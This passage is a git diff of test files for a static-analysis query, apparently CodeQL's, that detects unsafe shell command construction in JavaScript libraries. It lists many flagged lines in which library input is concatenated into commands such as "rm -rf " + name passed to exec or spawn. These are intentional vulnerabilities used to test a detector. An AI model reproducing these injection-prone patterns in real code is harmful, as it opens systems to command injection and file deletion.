cp.exec ... + name) | shell command | -| lib/lib.js:38:11:38:26 | "rm -rf " + name | lib/lib.js:37:13:37:16 | name | lib/lib.js:38:23:38:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:37:13:37:16 | name | library input | lib/lib.js:38:3:38:27 | cp.exec ... + name) | shell command | -| lib/lib.js:41:11:41:26 | "rm -rf " + name | lib/lib.js:40:6:40:9 | name | lib/lib.js:41:23:41:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:40:6:40:9 | name | library input | lib/lib.js:41:3:41:27 | cp.exec ... + name) | shell command | -| lib/lib.js:50:35:50:50 | "rm -rf " + name | lib/lib.js:49:31:49:34 | name | lib/lib.js:50:47:50:50 | name | This string concatenation which depends on $@ is later used in a $@. 
| lib/lib.js:49:31:49:34 | name | library input | lib/lib.js:50:2:50:51 | require ... + name) | shell command | -| lib/lib.js:54:13:54:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:54:25:54:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:55:2:55:14 | cp.exec(cmd1) | shell command | -| lib/lib.js:57:13:57:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:57:25:57:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:59:3:59:14 | cp.exec(cmd) | shell command | -| lib/lib.js:65:10:65:25 | "rm -rf " + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:65:22:65:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:65:2:65:26 | cp.exec ... + name) | shell command | -| lib/lib.js:69:10:69:47 | "for fo ... la end" | lib/lib.js:64:41:64:44 | name | lib/lib.js:69:27:69:30 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:69:2:69:48 | cp.exec ... a end") | shell command | -| lib/lib.js:71:10:71:31 | "cat /f ... + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:71:28:71:31 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:71:2:71:32 | cp.exec ... + name) | shell command | -| lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | lib/lib.js:64:41:64:44 | name | lib/lib.js:73:21:73:24 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:73:2:73:32 | cp.exec ... 
+ "\\"") | shell command | -| lib/lib.js:75:10:75:29 | "cat '" + name + "'" | lib/lib.js:64:41:64:44 | name | lib/lib.js:75:20:75:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:75:2:75:30 | cp.exec ... + "'") | shell command | -| lib/lib.js:77:10:77:37 | "cat '/ ... e + "'" | lib/lib.js:64:41:64:44 | name | lib/lib.js:77:28:77:31 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:77:2:77:38 | cp.exec ... + "'") | shell command | -| lib/lib.js:83:10:83:25 | "rm -rf " + name | lib/lib.js:82:35:82:38 | name | lib/lib.js:83:22:83:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:83:2:83:26 | cp.exec ... + name) | shell command | -| lib/lib.js:86:13:86:16 | name | lib/lib.js:82:35:82:38 | name | lib/lib.js:86:13:86:16 | name | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:87:2:87:25 | cp.exec ... n(" ")) | shell command | -| lib/lib.js:89:21:89:24 | name | lib/lib.js:82:35:82:38 | name | lib/lib.js:89:21:89:24 | name | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:89:2:89:36 | cp.exec ... n(" ")) | shell command | -| lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | lib/lib.js:82:35:82:38 | name | lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:91:2:91:50 | cp.exec ... n(" ")) | shell command | -| lib/lib.js:98:35:98:38 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:98:35:98:38 | name | This formatted string which depends on $@ is later used in a $@. 
| lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:98:2:98:40 | cp.exec ... name)) | shell command | -| lib/lib.js:100:37:100:40 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:100:37:100:40 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:100:2:100:42 | cp.exec ... name)) | shell command | -| lib/lib.js:102:46:102:49 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:102:46:102:49 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:102:2:102:51 | cp.exec ... name)) | shell command | -| lib/lib.js:108:41:108:44 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:108:41:108:44 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:108:2:108:46 | cp.exec ... name)) | shell command | -| lib/lib.js:112:10:112:25 | "rm -rf " + name | lib/lib.js:111:34:111:37 | name | lib/lib.js:112:22:112:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:111:34:111:37 | name | library input | lib/lib.js:112:2:112:26 | cp.exec ... + name) | shell command | -| lib/lib.js:121:10:121:25 | "rm -rf " + name | lib/lib.js:120:33:120:36 | name | lib/lib.js:121:22:121:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:120:33:120:36 | name | library input | lib/lib.js:121:2:121:26 | cp.exec ... + name) | shell command | -| lib/lib.js:131:11:131:26 | "rm -rf " + name | lib/lib.js:130:6:130:9 | name | lib/lib.js:131:23:131:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:130:6:130:9 | name | library input | lib/lib.js:131:3:131:27 | cp.exec ... 
+ name) | shell command | -| lib/lib.js:149:12:149:27 | "rm -rf " + name | lib/lib.js:148:37:148:40 | name | lib/lib.js:149:24:149:27 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:148:37:148:40 | name | library input | lib/lib.js:152:2:152:23 | cp.spaw ... gs, cb) | shell command | -| lib/lib.js:161:13:161:28 | "rm -rf " + name | lib/lib.js:155:38:155:41 | name | lib/lib.js:161:25:161:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:155:38:155:41 | name | library input | lib/lib.js:163:2:167:2 | cp.spaw ... t' }\\n\\t) | shell command | -| lib/lib.js:173:10:173:23 | "fo \| " + name | lib/lib.js:170:41:170:44 | name | lib/lib.js:173:20:173:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:170:41:170:44 | name | library input | lib/lib.js:173:2:173:24 | cp.exec ... + name) | shell command | -| lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" | lib/lib.js:177:38:177:41 | name | lib/lib.js:181:21:181:46 | name.re ... "'\\''") | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command | -| lib/lib.js:182:10:182:27 | "rm -rf " + broken | lib/lib.js:177:38:177:41 | name | lib/lib.js:182:22:182:27 | broken | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command | -| lib/lib.js:187:10:187:25 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:187:22:187:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:187:2:187:26 | cp.exec ... 
+ name) | shell command | -| lib/lib.js:190:11:190:26 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:190:23:190:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:190:3:190:27 | cp.exec ... + name) | shell command | -| lib/lib.js:197:10:197:25 | "rm -rf " + name | lib/lib.js:196:45:196:48 | name | lib/lib.js:197:22:197:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:196:45:196:48 | name | library input | lib/lib.js:197:2:197:26 | cp.exec ... + name) | shell command | -| lib/lib.js:200:11:200:26 | "rm -rf " + name | lib/lib.js:196:45:196:48 | name | lib/lib.js:200:23:200:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:196:45:196:48 | name | library input | lib/lib.js:200:3:200:27 | cp.exec ... + name) | shell command | -| lib/lib.js:207:10:207:25 | "rm -rf " + name | lib/lib.js:206:45:206:48 | name | lib/lib.js:207:22:207:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:206:45:206:48 | name | library input | lib/lib.js:207:2:207:26 | cp.exec ... + name) | shell command | -| lib/lib.js:212:11:212:26 | "rm -rf " + name | lib/lib.js:206:45:206:48 | name | lib/lib.js:212:23:212:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:206:45:206:48 | name | library input | lib/lib.js:212:3:212:27 | cp.exec ... + name) | shell command | -| lib/lib.js:217:10:217:25 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:217:22:217:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:217:2:217:26 | cp.exec ... 
+ name) | shell command | -| lib/lib.js:220:11:220:26 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:220:23:220:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:220:3:220:27 | cp.exec ... + name) | shell command | -| lib/lib.js:224:10:224:25 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:224:22:224:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:224:2:224:26 | cp.exec ... + name) | shell command | -| lib/lib.js:228:10:228:25 | "rm -rf " + name | lib/lib.js:227:39:227:42 | name | lib/lib.js:228:22:228:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:227:39:227:42 | name | library input | lib/lib.js:228:2:228:26 | cp.exec ... + name) | shell command | -| lib/lib.js:236:10:236:25 | "rm -rf " + name | lib/lib.js:227:39:227:42 | name | lib/lib.js:236:22:236:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:227:39:227:42 | name | library input | lib/lib.js:236:2:236:26 | cp.exec ... + name) | shell command | -| lib/lib.js:249:10:249:25 | "rm -rf " + name | lib/lib.js:248:42:248:45 | name | lib/lib.js:249:22:249:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:248:42:248:45 | name | library input | lib/lib.js:249:2:249:26 | cp.exec ... + name) | shell command | -| lib/lib.js:253:10:253:28 | "rm -rf " + cleaned | lib/lib.js:248:42:248:45 | name | lib/lib.js:253:22:253:28 | cleaned | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:248:42:248:45 | name | library input | lib/lib.js:253:2:253:29 | cp.exec ... 
leaned) | shell command | -| lib/lib.js:258:10:258:25 | "rm -rf " + name | lib/lib.js:257:35:257:38 | name | lib/lib.js:258:22:258:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:257:35:257:38 | name | library input | lib/lib.js:258:2:258:26 | cp.exec ... + name) | shell command | -| lib/lib.js:261:11:261:33 | "rm -rf ... + name | lib/lib.js:257:35:257:38 | name | lib/lib.js:261:30:261:33 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:257:35:257:38 | name | library input | lib/lib.js:261:3:261:34 | cp.exec ... + name) | shell command | -| lib/lib.js:268:10:268:32 | "rm -rf ... version | lib/lib.js:267:46:267:48 | obj | lib/lib.js:268:22:268:32 | obj.version | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:267:46:267:48 | obj | library input | lib/lib.js:268:2:268:33 | cp.exec ... ersion) | shell command | -| lib/lib.js:277:11:277:30 | "rm -rf " + opts.bla | lib/lib.js:276:8:276:11 | opts | lib/lib.js:277:23:277:30 | opts.bla | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:276:8:276:11 | opts | library input | lib/lib.js:277:3:277:31 | cp.exec ... ts.bla) | shell command | -| lib/lib.js:281:11:281:35 | "rm -rf ... pts.bla | lib/lib.js:276:8:276:11 | opts | lib/lib.js:281:23:281:35 | this.opts.bla | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:276:8:276:11 | opts | library input | lib/lib.js:281:3:281:36 | cp.exec ... ts.bla) | shell command | -| lib/lib.js:308:11:308:26 | "rm -rf " + name | lib/lib.js:307:39:307:42 | name | lib/lib.js:308:23:308:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:307:39:307:42 | name | library input | lib/lib.js:308:3:308:27 | cp.exec ... 
+ name) | shell command | -| lib/lib.js:315:10:315:25 | "rm -rf " + name | lib/lib.js:314:40:314:43 | name | lib/lib.js:315:22:315:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:314:40:314:43 | name | library input | lib/lib.js:315:2:315:26 | cp.exec ... + name) | shell command | -| lib/lib.js:320:11:320:26 | "rm -rf " + name | lib/lib.js:314:40:314:43 | name | lib/lib.js:320:23:320:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:314:40:314:43 | name | library input | lib/lib.js:320:3:320:27 | cp.exec ... + name) | shell command | -| lib/lib.js:325:12:325:51 | "MyWind ... " + arg | lib/lib.js:324:40:324:42 | arg | lib/lib.js:325:49:325:51 | arg | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:324:40:324:42 | arg | library input | lib/lib.js:326:2:326:13 | cp.exec(cmd) | shell command | -| lib/lib.js:340:10:340:26 | "rm -rf " + id(n) | lib/lib.js:339:39:339:39 | n | lib/lib.js:340:22:340:26 | id(n) | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:339:39:339:39 | n | library input | lib/lib.js:340:2:340:27 | cp.exec ... id(n)) | shell command | -| lib/lib.js:351:10:351:27 | "rm -rf " + unsafe | lib/lib.js:349:29:349:34 | unsafe | lib/lib.js:351:22:351:27 | unsafe | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:349:29:349:34 | unsafe | library input | lib/lib.js:351:2:351:28 | cp.exec ... unsafe) | shell command | -| lib/lib.js:406:10:406:25 | "rm -rf " + name | lib/lib.js:405:39:405:42 | name | lib/lib.js:406:22:406:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:405:39:405:42 | name | library input | lib/lib.js:406:2:406:26 | cp.exec ... 
+ name) | shell command | -| lib/lib.js:415:10:415:25 | "rm -rf " + name | lib/lib.js:414:40:414:43 | name | lib/lib.js:415:22:415:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:415:2:415:26 | cp.exec ... + name) | shell command | -| lib/lib.js:417:28:417:31 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:417:28:417:31 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:417:2:417:66 | cp.exec ... => {}) | shell command | -| lib/lib.js:418:25:418:28 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:418:25:418:28 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:418:2:418:45 | cp.spaw ... true}) | shell command | -| lib/lib.js:419:32:419:35 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:419:32:419:35 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:419:2:419:52 | cp.exec ... true}) | shell command | -| lib/lib.js:420:29:420:32 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:420:29:420:32 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:420:2:420:49 | cp.spaw ... true}) | shell command | -| lib/lib.js:424:24:424:27 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:424:24:424:27 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:424:2:424:40 | spawn(" ... WN_OPT) | shell command | -| lib/lib.js:426:11:426:14 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:426:11:426:14 | name | This shell argument which depends on $@ is later used in a $@. 
| lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | shell command | -| lib/lib.js:427:14:427:16 | arr | lib/lib.js:414:40:414:43 | name | lib/lib.js:427:14:427:16 | arr | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | shell command | -| lib/lib.js:428:14:428:58 | build(" ... + '-') | lib/lib.js:414:40:414:43 | name | lib/lib.js:428:14:428:58 | build(" ... + '-') | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | shell command | -| lib/lib.js:436:19:436:22 | last | lib/lib.js:414:40:414:43 | name | lib/lib.js:436:19:436:22 | last | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | shell command | -| lib/lib.js:442:12:442:27 | "rm -rf " + name | lib/lib.js:441:39:441:42 | name | lib/lib.js:442:24:442:27 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:441:39:441:42 | name | library input | lib/lib.js:442:2:442:28 | asyncEx ... + name) | shell command | -| lib/lib.js:447:13:447:28 | "rm -rf " + name | lib/lib.js:446:20:446:23 | name | lib/lib.js:447:25:447:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:446:20:446:23 | name | library input | lib/lib.js:447:3:447:29 | asyncEx ... + name) | shell command | -| lib/lib.js:478:27:478:46 | config.installedPath | lib/lib.js:477:33:477:38 | config | lib/lib.js:478:27:478:46 | config.installedPath | This path concatenation which depends on $@ is later used in a $@. | lib/lib.js:477:33:477:38 | config | library input | lib/lib.js:479:12:479:20 | exec(cmd) | shell command | -| lib/lib.js:483:13:483:33 | ' my na ... 
+ name | lib/lib.js:482:40:482:43 | name | lib/lib.js:483:30:483:33 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:482:40:482:43 | name | library input | lib/lib.js:485:2:485:20 | cp.exec(cmd + args) | shell command | -| lib/lib.js:499:19:499:34 | "rm -rf " + name | lib/lib.js:498:45:498:48 | name | lib/lib.js:499:31:499:34 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:498:45:498:48 | name | library input | lib/lib.js:499:3:499:35 | MyThing ... + name) | shell command | -| lib/lib.js:510:10:510:25 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:510:22:510:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:510:2:510:26 | cp.exec ... + name) | shell command | -| lib/lib.js:513:11:513:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:513:23:513:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:513:3:513:27 | cp.exec ... + name) | shell command | -| lib/lib.js:519:11:519:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:519:23:519:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:519:3:519:27 | cp.exec ... + name) | shell command | -| lib/lib.js:525:11:525:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:525:23:525:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:525:3:525:27 | cp.exec ... + name) | shell command | -| lib/lib.js:531:11:531:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:531:23:531:26 | name | This string concatenation which depends on $@ is later used in a $@. 
| lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:531:3:531:27 | cp.exec ... + name) | shell command | -| lib/lib.js:537:11:537:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:537:23:537:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:537:3:537:27 | cp.exec ... + name) | shell command | -| lib/lib.js:543:11:543:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:543:23:543:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:543:3:543:27 | cp.exec ... + name) | shell command | -| lib/lib.js:545:11:545:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:545:23:545:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:545:3:545:27 | cp.exec ... + name) | shell command | -| lib/lib.js:552:23:552:26 | args | lib/lib.js:550:39:550:42 | name | lib/lib.js:552:23:552:26 | args | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:550:39:550:42 | name | library input | lib/lib.js:552:9:552:38 | cp.spaw ... wnOpts) | shell command | -| lib/lib.js:555:33:555:36 | name | lib/lib.js:550:39:550:42 | name | lib/lib.js:555:33:555:36 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:550:39:550:42 | name | library input | lib/lib.js:552:9:552:38 | cp.spaw ... wnOpts) | shell command | -| lib/lib.js:560:14:560:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:560:26:560:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:560:9:560:30 | exec("r ... 
+ name) | shell command | -| lib/lib.js:562:14:562:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:562:26:562:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:562:9:562:30 | exec("r ... + name) | shell command | -| lib/lib.js:566:14:566:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:566:26:566:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:566:9:566:30 | exec("r ... + name) | shell command | -| lib/lib.js:573:10:573:25 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:573:22:573:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:573:2:573:26 | cp.exec ... + name) | shell command | -| lib/lib.js:579:13:579:28 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:579:25:579:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:579:5:579:29 | cp.exec ... + name) | shell command | -| lib/lib.js:590:17:590:32 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:590:29:590:32 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:590:9:590:33 | cp.exec ... + name) | shell command | -| lib/lib.js:593:13:593:28 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:593:25:593:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:593:5:593:29 | cp.exec ... 
+ name) | shell command | -| lib/lib.js:609:10:609:25 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:609:22:609:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:609:2:609:26 | cp.exec ... + name) | shell command | -| lib/lib.js:626:17:626:32 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:626:29:626:32 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:626:9:626:33 | cp.exec ... + name) | shell command | -| lib/lib.js:629:13:629:28 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:629:25:629:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:629:5:629:29 | cp.exec ... + name) | shell command | -| lib/lib.js:633:18:633:68 | "'" + n ... ) + "'" | lib/lib.js:632:38:632:41 | name | lib/lib.js:633:24:633:62 | name.re ... '\\\\''") | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:632:38:632:41 | name | library input | lib/lib.js:634:2:634:31 | cp.exec ... itized) | shell command | -| lib/lib.js:634:10:634:30 | "rm -rf ... nitized | lib/lib.js:632:38:632:41 | name | lib/lib.js:634:22:634:30 | sanitized | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:632:38:632:41 | name | library input | lib/lib.js:634:2:634:31 | cp.exec ... itized) | shell command | -| lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | lib/subLib2/compiled-file.ts:3:26:3:29 | name | lib/subLib2/compiled-file.ts:4:25:4:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib2/compiled-file.ts:3:26:3:29 | name | library input | lib/subLib2/compiled-file.ts:4:5:4:29 | cp.exec ... 
+ name) | shell command | -| lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | lib/subLib2/special-file.js:3:28:3:31 | name | lib/subLib2/special-file.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib2/special-file.js:3:28:3:31 | name | library input | lib/subLib2/special-file.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | lib/subLib3/my-file.ts:3:28:3:31 | name | lib/subLib3/my-file.ts:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib3/my-file.ts:3:28:3:31 | name | library input | lib/subLib3/my-file.ts:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/subLib4/subsub.js:4:10:4:25 | "rm -rf " + name | lib/subLib4/index.js:6:32:6:35 | name | lib/subLib4/subsub.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib4/index.js:6:32:6:35 | name | library input | lib/subLib4/subsub.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/subLib/amdSub.js:4:10:4:25 | "rm -rf " + name | lib/subLib/amdSub.js:3:28:3:31 | name | lib/subLib/amdSub.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/amdSub.js:3:28:3:31 | name | library input | lib/subLib/amdSub.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/subLib/index.js:4:10:4:25 | "rm -rf " + name | lib/subLib/index.js:3:28:3:31 | name | lib/subLib/index.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/index.js:3:28:3:31 | name | library input | lib/subLib/index.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/subLib/index.js:8:10:8:25 | "rm -rf " + name | lib/subLib/index.js:7:32:7:35 | name | lib/subLib/index.js:8:22:8:25 | name | This string concatenation which depends on $@ is later used in a $@. 
| lib/subLib/index.js:7:32:7:35 | name | library input | lib/subLib/index.js:8:2:8:26 | cp.exec ... + name) | shell command | -| lib/subLib/index.js:14:22:14:24 | arr | lib/subLib/index.js:13:44:13:46 | arr | lib/subLib/index.js:14:22:14:24 | arr | This shell argument which depends on $@ is later used in a $@. | lib/subLib/index.js:13:44:13:46 | arr | library input | lib/subLib/index.js:14:5:14:40 | cp.spaw ... true}) | shell command | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref index f1dbca0e19c9..26c43ff16ca6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref @@ -1 +1,2 @@ -Security/CWE-078/UnsafeShellCommandConstruction.ql \ No newline at end of file +query: Security/CWE-078/UnsafeShellCommandConstruction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js index 116b624615b1..b4f75df03ac4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js @@ -2,6 +2,6 @@ const cp = require("child_process"); -module.exports.thisMethodIsImported = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.thisMethodIsImported = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } \ No newline at end of file 
